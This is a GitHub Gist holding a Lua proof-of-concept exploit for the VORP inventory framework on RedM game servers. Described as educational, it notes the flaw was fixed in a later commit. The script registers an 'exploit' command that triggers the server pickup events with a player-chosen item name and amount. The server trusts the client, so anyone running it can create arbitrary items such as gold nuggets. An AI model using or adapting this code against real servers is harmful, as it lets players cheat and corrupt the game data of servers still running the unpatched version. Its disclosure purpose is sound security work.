Last active
July 19, 2024 23:03
-
-
Save draobrehtom/20bb3925e8c36fa7a7d4747a650623cd to your computer and use it in GitHub Desktop.
Exploiting inventory items within the VORP Framework (RedM) for educational purposes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-- vorp_inventory source code:https://github.com/VORPCORE/vorp_inventory-lua | |
local uid = nil | |
RegisterNetEvent('vorpInventory:sharePickupClient', function(data) | |
if data.obj == 'NEVER_TRUST_CLIENT_SIDE' then | |
uid = data.uid | |
end | |
end) | |
RegisterCommand('exploit', function(source, args) | |
local name = args[1] or 'gold_nugget' | |
local amount = tonumber(args[2]) or 1 | |
local metadata = {} | |
local weaponId = 1 | |
local data = { | |
name = name, | |
obj = 'NEVER_TRUST_CLIENT_SIDE', | |
amount = amount, | |
metadata = metadata, | |
position = GetEntityCoords(PlayerPedId()), | |
weaponId = weaponId, | |
} | |
TriggerServerEvent("vorpinventory:sharePickupServer", data) | |
local timeoutAt = GetGameTimer() + 30000 | |
while uid == nil do | |
Wait(0) | |
if GetGameTimer() > timeoutAt then | |
print('Request timeout. UID was not received.') | |
return | |
end | |
end | |
TriggerServerEvent("vorpinventory:onPickup", { | |
data = { | |
['NEVER_TRUST_CLIENT_SIDE'] = { | |
uid = uid, | |
}, | |
}, | |
key = 'NEVER_TRUST_CLIENT_SIDE', | |
}) | |
uid = nil | |
end) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Vulnerability has been fixed in next commit: VORPCORE/vorp_inventory-lua@eeb2bb5